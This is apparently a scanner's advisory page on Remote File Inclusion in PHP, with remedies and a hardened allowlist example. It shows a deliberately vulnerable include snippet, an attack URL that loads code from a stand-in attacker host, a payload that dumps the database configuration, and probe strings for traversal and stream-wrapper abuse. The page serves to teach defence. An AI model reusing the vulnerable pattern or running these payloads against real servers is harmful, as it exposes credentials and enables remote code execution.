Severity: High
Test name: Remote File Inclusion (RFI)
Test ID: rfi
Summary
Remote File Inclusion (RFI) targets web applications that dynamically incorporate external files or scripts. The vulnerability arises when an application takes user-provided input (such as a URL or a parameter value) and passes it to a file inclusion call (in PHP, for example, include or require). An attacker can then make the application fetch a file from a host they control and execute it. The malicious code runs on the server with the privileges of the web server user, which can compromise the integrity and confidentiality of the server and of any data it can reach.
Impact
This vulnerability allows an attacker to:
Execute unauthorized code in the server-side application
Execute unauthorized code in the client-side application (when the included content is returned to the browser)
Gain access to sensitive information, such as configuration files and credentials
Crash the server or otherwise degrade its availability
Basic example of Remote File Inclusion (PHP)
1. Server-side code:
```php
<?php
// Default template used when no parameter is supplied.
$file = 'form.php';
// Vulnerable: the 'file' parameter is used as the include target without any
// validation. $_REQUEST also accepts POST bodies and cookies, not only the
// query string.
if (isset($_REQUEST['file'])) {
    $file = $_REQUEST['file'];
}
// With allow_url_include enabled, a URL here makes PHP fetch the remote file
// and execute it as code on this server.
include $file;
```
2. Request:
```
https://your_web_site/preview.php?file=http://dangerous_web_site.com/malicious_code.php
```
3. Content of "malicious_code.php", served by the attacker's host as raw text (it is not executed there, only on the victim server):
```php
<?php
// Runs on the victim server: includes its local database configuration and
// dumps the value that include returns. This discloses the settings when
// db.php returns them as an array (a common configuration style).
var_dump(include('../config/db.php'));
```
As a result, the attacker can read the database configuration (host, user name, password) from the server's response.
Location
The issue can be found in the source code on the server side.
The issue can be found in the source code on the client side.
Remedy suggestions
The most effective solution is to never pass user-submitted input to a file system or framework API that loads code.
If the set of files that may be included is limited, store each of them as a record in long-term storage (for example, a database) or in a fixed server-side map under its own identifier, and accept only that identifier as the request parameter. The identifier is resolved to a file path on the server, so the request never carries a path or URL at all.
If the allowed files cannot be enumerated and user input cannot be avoided, validate the supplied value against an explicit allowlist of trusted file names and reject everything else; do not try to strip URL schemes or "../" sequences from untrusted input, because such cleaning is easy to bypass. In PHP, additionally set allow_url_include=Off (and, where the application does not need it, allow_url_fopen=Off) in php.ini as defense in depth. Note that this setting blocks remote inclusion only; it does not protect against local file inclusion through the same parameter, which is why the allowlist is still required.
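The following hardened preview.php is an added example and is not part of the original test description or the scanner's code. It implements the identifier-to-file mapping described above for the vulnerable snippet shown earlier: the request value is used only as a lookup key into a fixed map, so the string that reaches include() always originates in this file. The template names, the templates/ directory layout and the probe inputs in the CLI self-check are assumptions.

```php
<?php
// Added example, not the original page's code. Hardened replacement for the
// vulnerable preview.php: user input is only ever a lookup key into a fixed
// map; the string passed to include() never comes from the request.
// Template names and directory layout are assumptions.

declare(strict_types=1);

const DEFAULT_TEMPLATE = 'form';

// Allowlist of identifier => absolute path. Adding a template means editing
// this map, which is the single intended maintenance point.
const ALLOWED_TEMPLATES = [
    'form'    => __DIR__ . '/templates/form.php',
    'summary' => __DIR__ . '/templates/summary.php',
    'terms'   => __DIR__ . '/templates/terms.php',
];

/**
 * Map a raw request value to an allowlisted path.
 * Returns null for anything that is not an exact string key: URLs, "../"
 * sequences, php:// wrappers, null bytes and array parameters (file[]=x)
 * all fall through the same rejection branch, so no path parsing or
 * "sanitizing" of the input is attempted.
 */
function resolveTemplate($requested): ?string
{
    if ($requested === null) {
        return ALLOWED_TEMPLATES[DEFAULT_TEMPLATE];
    }
    if (!is_string($requested) || !array_key_exists($requested, ALLOWED_TEMPLATES)) {
        return null;
    }
    return ALLOWED_TEMPLATES[$requested];
}

if (PHP_SAPI === 'cli') {
    // Self-check when run as `php preview.php`: constructed attacker inputs
    // (assumptions), each of which must be rejected; only 'form' resolves.
    $probes = [
        'form',                                               // allowed key
        'http://dangerous_web_site.com/malicious_code.php',   // RFI attempt
        '../config/db.php',                                   // LFI attempt
        'php://filter/convert.base64-encode/resource=index',  // stream wrapper
        "form\0.php",                                         // null byte
        ['form'],                                             // array parameter
    ];
    foreach ($probes as $probe) {
        $label = is_array($probe) ? '[array]' : addcslashes($probe, "\0");
        printf("%-55s => %s\n", $label, resolveTemplate($probe) ?? 'REJECTED');
    }
    exit(0);
}

// Web request path: only $_GET is consulted (the original used $_REQUEST,
// which also accepts POST bodies and cookies).
$template = resolveTemplate($_GET['file'] ?? null);
if ($template === null) {
    http_response_code(400);
    exit('Unknown template');
}
include $template;
```

Running `php preview.php` from the command line prints one line per probe and shows that every remote URL, traversal string, stream wrapper, null-byte and array input is rejected while the plain identifier resolves to its mapped path. Because rejection is the default branch, a new bypass technique cannot slip through without first matching a key that the developers wrote themselves; combined with allow_url_include=Off in php.ini, the remote fetch in the attack above is blocked twice.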